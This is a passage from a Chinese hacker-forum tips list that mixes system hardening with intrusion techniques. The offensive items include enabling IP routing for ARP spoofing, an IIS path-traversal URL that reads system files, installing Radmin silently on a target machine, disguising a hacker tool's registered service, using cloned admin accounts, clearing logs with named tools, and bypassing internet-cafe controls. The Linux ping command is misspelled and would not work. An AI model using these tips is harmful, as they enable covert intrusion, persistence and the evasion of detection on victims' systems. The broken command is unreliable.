整理:冰血封情  來自:http://eviloctal.hackway.net

    NO.1修改Terminal Server的端口

    服務(wù)端

    進(jìn)入注冊表編輯器，依次展開如下鍵名：

    HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp

    在右窗口中修改PortNumber的數(shù)值為任意端口號，推薦1025<端口號<65535

    客戶端

    啟動(dòng)Terminal Server Client的客戶端管理器，到出連接文件為*.cns，用記事本打開修改Server Port與服務(wù)器一致就OK了.

    最后將修改過的*.cns重新導(dǎo)入Terminal Server Client的客戶端管理器，

Hack新手一定要知道的問題

    NO.2禁止遠(yuǎn)程訪問注冊表

    In order to keep your data away from the black hats, you should do more about your system, just like pay more attention to the remote registry service!!!

    方法一、

    右鍵單擊‘我的電腦'，選‘管理'，‘服務(wù)和應(yīng)用程序'，‘服務(wù)'！

    停止并且禁用Remote Registry Service服務(wù)！

    方法二、

    打開注冊表編輯器的如下鍵：

    HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSecurePipeServers

    把其下的WinReg的鍵職改成1就可以了。

    NO.3禁止非管理員用戶使用AT命令

    這個(gè)小技巧的好處應(yīng)該不言而喻：）

    啟動(dòng)注冊表編輯器，展開如下鍵：

    HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa

    在右邊新建立一個(gè)SubmitControl鍵名，DWORD值為1。

    NO.4使LINUX對PING不響應(yīng)

    LINUX應(yīng)該逐漸成為各位大峽小鳥手中之寶了吧？怎么才能讓它不響應(yīng)ICMP來保護(hù)自己呢？

    可以用：

    echo 1 > /proc/sys/net/ipv4/icmp_echo_igore_all

    想恢復(fù)的時(shí)候用：

    echo 0 > /proc/sys/net/ipv4/icmp_echo_igore_all

    NO.5讓W(xué)IN98安全模式支持網(wǎng)絡(luò)

    大家都知道WIN98安全模式要是可以進(jìn)去，是可以不受網(wǎng)吧安全管理軟件的約束的！BUT安全模式不加載網(wǎng)絡(luò)驅(qū)動(dòng)，下面冰血告訴你一種讓W(xué)IN98的安全模式提供網(wǎng)絡(luò)支持的方法。

    1、F8進(jìn)入安全模式。

    2、選擇Command Prompt Only。

    3、進(jìn)入命令行狀態(tài)時(shí)，輸入Win /d:n即可以進(jìn)入代命令行的安全模式。

    NO.6啟動(dòng)IP路由功能

    一般我們在WINDOWSNT/2K/XP使用ARP欺騙攻擊的時(shí)候都需要先打開IP路由功能。

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters

    IPEnableRouter=0x1

    NO.7強(qiáng)大的FC對比命令

    我們在使用系統(tǒng)和進(jìn)行各種任務(wù)的時(shí)候經(jīng)常需要用到文件的對比，那么我們是自己一點(diǎn)點(diǎn)的對比么？當(dāng)然不是我們用強(qiáng)大的FC對比命令。

    具體參數(shù)請用FC /?進(jìn)行查看

    NO.8通過驗(yàn)證Banner手工鑒別FTP

    cmd下輸入

    ftp TargetIP

    User (TargetIP:(none)):ftp

    331 User name okey, please send complete E-mail address as password.

    Password:

    如果成功

    230 User logged in, proceed.

    如果失敗

    530 Sorry, no ANONYMOUS access allowed.

    特別是這一行字是Serv-U的特有標(biāo)志

    331 User name okey, please send complete E-mail address as password.

    假如是MS FTP呢

    cmd下輸入

    ftp TargetIP

    220 antivirus Microsoft FTP Serveice(Version 5.0).

    User (TargetIP:(none)): ftp

    331 Password required for ftp.

    Password:

    530 User ftp cannot log in.

    特別是這一行字是MS FTP的特有標(biāo)志

    331 Password required for ftp.

    NO.9漏洞qsumrhit.htw和iirturnh.htw的使用方法

    這個(gè)比較希奇，還是說說：

    提交例如如下的連接就可以了......

    連接iissamples/issamples/oop/qsumrhit.htw?ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full">http://www.xxxx.com/iissamples/issamples/oop/qsumrhit.htw?ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full

    NO.10遠(yuǎn)程控制軟件Radmin安裝注意事項(xiàng)

    網(wǎng)絡(luò)滲透中，

電腦資料

    Radmin /install /silence

    否則對方的計(jì)算機(jī)窗口會(huì)彈出一個(gè)提示框說"遠(yuǎn)程管理服務(wù)已經(jīng)安裝"。

    NO.12終端服務(wù)客戶端的操作問題

    注意，通過克隆而獲得管理員權(quán)限的用戶是和管理員共用一個(gè)桌面的。如果你在桌面建立東西，管理員那邊是同樣可以看見的。

    NO.13注冊成服務(wù)的 軟件的各項(xiàng)指標(biāo)修改方法

    假如你已經(jīng)吧一個(gè)叫hackertools的工具注冊成了系統(tǒng)的服務(wù)，在服務(wù)列表中存在。那么你要怎么修改他的名字呢？

    這里進(jìn)入注冊表

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services

    找到它的服務(wù)名，假設(shè)是hcktol，現(xiàn)在展開他的下面間。

    displayname就是服務(wù)顯示名

    description就是服務(wù)描述

    另外可以通過用16進(jìn)制編輯器修改服務(wù)進(jìn)程名。

    用輔助工具instsrv.vbs把程序安裝成自己的指定服務(wù)名和服務(wù)相識名服務(wù)。具體請看幫助，到處有下。

    NO.14有關(guān)清除日志的話題

    http://www.EvilOctal.com/forum/read.php?tid=1881

    http://www.EvilOctal.com/forum/read.php?tid=1821

    http://www.EvilOctal.com/forum/read.php?tid=1781

    http://www.EvilOctal.com/forum/read.php?tid=1610

    http://www.EvilOctal.com/forum/read.php?tid=1581

    http://www.EvilOctal.com/forum/read.php?tid=1490

    http://www.EvilOctal.com/forum/read.php?tid=1429

    http://www.EvilOctal.com/forum/read.php?tid=1337

    http://www.EvilOctal.com/forum/read.php?tid=1236

    http://www.EvilOctal.com/forum/read.php?tid=992

    http://www.EvilOctal.com/forum/read.php?tid=942

    http://www.EvilOctal.com/forum/read.php?tid=594

    http://www.EvilOctal.com/forum/read.php?tid=196

    http://www.eviloctal.com/forum/read.php?tid=2016

    以上是在 邪惡八進(jìn)制（EvilOctal）暨安全高峰（SecurityPeak）論壇上 以關(guān)鍵字為"日志"的資料索引 分別對應(yīng)如下主題：

    [轉(zhuǎn)帖]3389如何擦除日志

    [轉(zhuǎn)載]關(guān)于入侵檢測系統(tǒng)之日志檢測詳解

    [轉(zhuǎn)載]入侵檢測之日志檢測

    [轉(zhuǎn)載]國外的培訓(xùn)課程 安全日志的秘密

    [轉(zhuǎn)載]Windows日志的保護(hù)與偽造

    [轉(zhuǎn)載]用perl寫了個(gè)把IIS日志導(dǎo)入到mysql的程序

    [轉(zhuǎn)載]終端服務(wù)的日志監(jiān)控

    [轉(zhuǎn)載]刪除sql server日志

    [轉(zhuǎn)載]WINDOWS安全事件日志中的事件編號與描述

    [轉(zhuǎn)載]如何用elsave清除日志

    [轉(zhuǎn)載]FreeBSD的系統(tǒng)log日志

    [轉(zhuǎn)載]UNIX系統(tǒng)后門的安放和日志的擦除

    [轉(zhuǎn)載]安全事件日志事件編號與描述

    [轉(zhuǎn)載]詳述Windows 2000的日志及其刪除方法

    共13條信息

    非常感謝你支持偶們！

    關(guān)于...自動(dòng)清除日志軟件類很多

    如：

    小榕的elsave清除日志工具

    小榕的CleanIISLog來自動(dòng)清除日志

    還有CSDN公布的ClearLogs工具

    以及擦PP工具0x333shadow

    專業(yè)清除日志iisantidote-v2工具也可以

    NO.15無法刪除文件的問題

    有時(shí)候我們要?jiǎng)h除一些文件 經(jīng)常提示無法刪除 EvilOctal總結(jié)了一下 主要有以下幾種可能

    第一 文件名中可能有特殊符號

    那么無論你是在操作系統(tǒng)中 還是使用命令行下的del命令都是無法刪除的 這時(shí)解決方法是使用命令rd "\\?\文件路徑\文件名" 就可以刪除了

    第二 有可能是文件正在使用中

    那么只要找到正在使用該軟件的進(jìn)程 終止后刪除 當(dāng)然一般情況下也可以到安全模式或者命令行下刪除的

    第三 可能是文件的優(yōu)先級不夠高

    在任務(wù)管理器里 把相關(guān)進(jìn)程的優(yōu)先級降低 然后再一頓狂殺亂砍

    第四 也許是磁盤有邏輯錯(cuò)誤

    使用chkdsk檢查一下再行刪除看看

    NO.16有關(guān)mid音樂格式的音軌調(diào)查

    今天朋友FlyingBird傳輸了一個(gè)音樂給我 mid格式的 但是實(shí)在是播放不了

    原來 mid音頻走的是 音樂控制面版中的 軟件合成器 的音軌

    不想 我把他靜音了 所以什么也聽不見

    在 主音量 控制面版里將 軟件合成器 鉤取消后就可以下的 靜音 取消就可以放了...

    NO.17在139入侵過程中遇見host not found？

    在正常情況下應(yīng)該是這樣的：

    引用內(nèi)容